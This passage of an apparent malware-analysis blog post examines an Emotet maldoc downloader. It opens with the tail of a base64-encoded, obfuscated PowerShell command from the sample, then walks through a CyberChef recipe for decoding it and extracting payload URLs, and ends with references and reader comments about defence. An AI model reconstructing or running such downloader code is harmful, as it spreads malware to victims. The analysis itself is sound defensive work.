oAIgBTAFQAYABBAHIAVAAiACgAJAByAHIANQBLAFIAdQB3ADEAKQA7ACQAZABmAHYANQBqADUAPQAnAG8AbgBYAHAAdgBxACcAOwBiAHIAZQBhAGsAOwAkAGwAagBqAEEAWABMADAAPQAnAFUAVwBtAHIAcgAxACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAGkAdwBRAFkAdwBQAD0AJwB3AGgAWAB6AFYAUABpACcA
So this is much better, and we are almost there. This is pretty much the same output we would have gotten taking the quicker route with automated tools or grabbing the encoded command from a previous detonation in a sandbox. Here we see an encoded PowerShell process being loaded by a WMI service. The only thing left to do is decode the base64 encoded chunk and derive the final PowerShell script. Luckily, the maldocs from the new Emotet campaigns are not nearly as complicated as they have been in the past with multiple layers of obfuscation and varying techniques with compression, arrays, character substitutions, and DOSFuscation etc,. In this case we really just need to decode the base64, an easy job for one of my favorite tools, CyberChef:
Dropping the block of Base64 into CyberChef, we just need to decode and then remove the Null bytes. The initial output will appear to have many periods, but they are actually null bytes, and if you try to do a string replace on the periods, you will get nowhere. I typically like to do some formatting for the URLs by marking some split delimiters and using regex to isolate the URLs. Remember, with Emotet, there are always five, which many researchers commonly refer to as the “quintet.” For what it’s worth, here is my recipe for this obfuscation style:
From_Base64('A-Za-z0-9+/=',true) Remove_null_bytes() Split('@','\n') Split('=\'','\n') Split('\'.','\n') Regular_expression('User defined','^(http:\/\/www\.|https:\/\/www\.|http:\/\/|https:\/\/)?[a-z0-9]+([\-\.]{1}[a-z0-9]+)\.[a-z]{2,5}(:[0-9]{1,5})?(\/.)?$',true,true,false,false,false,false,'List matches')
So that’s it, my (somewhat) quick look at one of Emotet’s new maldoc downloaders. It’s always fun to dig into one of these and solve the puzzle the hard way. Obviously, this isn’t the most appropriate method when just grabbing indicators, and I have written a few posts covering those best practices here and here. This was a fun exercise, and I hope you found some value or learned something new as well. Thank you for reading Security Soup, and please let me know if you have any feedback on ways to improve this blog or anything that I may have missed.
References
https://www.us-cert.gov/ncas/alerts/TA18-201A
https://twitter.com/MalwareTechBlog/status/1164616966499254272
https://twitter.com/Cryptolaemus1/status/1173519452190781442
https://blog.talosintelligence.com/2019/09/emotet-is-back-after-summer-break.html
https://blog.malwarebytes.com/botnets/2019/09/emotet-is-back-botnet-springs-back-to-life-with-new-spam-campaign/
https://www.bleepingcomputer.com/news/security/emotet-trojan-evolves-since-being-reawakend-here-is-what-we-know/
https://threatpost.com/emotet-summer-vacation-stolen-email-tactic/148460/
https://twitter.com/pollo290987/status/1174181052023267328
https://twitter.com/SethKingHi/status/1174992704398168065
https://pcsxcetrasupport3.wordpress.com/2019/09/20/a-deeper-look-inside-one-of-the-new-emotet-malware-docs/
https://security-soup.net/a-quick-look-at-emotets-updated-javascript-dropper/
https://github.com/decalage2/oletools
https://github.com/decalage2/ViperMonkey
https://gchq.github.io/CyberChef/
https://security-soup.net/extractnetworkindicators-part1/
Thank you, I am an IT Sys Admin, we don’t have much budget to defend ourself so we were attacked by this TrojanDownloader. I found the article very useful and interesting (I am also learning Cyber Security on my own) and I wanted to ask a question. Do you think that disabling the VBA plugin in outlook and block .rar , .zip and .doc extensions helps to slow down the spreading?
Thank you
Hi thanks for the comment. Those solutions may stop the spread, however there could be some unknown business impact to blocking those extensions. I would recommend disabling macros or only allowing signed macros if your org must use them. Hope this helps!
Hi, I’ve disabled VBA add-in but the mail are still present. Right now I have installed Eset Internet Security on every computer. How do they manage to still receive the emails? What do you suggest me? I have checked for new folders under roaming and local profile, new scheduled task but I can’t find anything…
Can you help me?
Thanks, best regards
This is a great article. But I’m stuck, when opening VB editor, there are only two modules (Normal and Project($file_name’)) in project view, I can’t see other user forms or class modules. Is these hidden, or I don’t have the right options in VB editor?
Hi There, thanks for the kind words. You should be able to see the modules. It’s possible you are in the wrong editor or have the wrong document. Take look at this other post to where I show how to access the VBA project, and you should then be able to see the objects. https://security-soup.net/how-to-extract-network-indicators-of-compromise-iocs-from-maldoc-macros-part-3/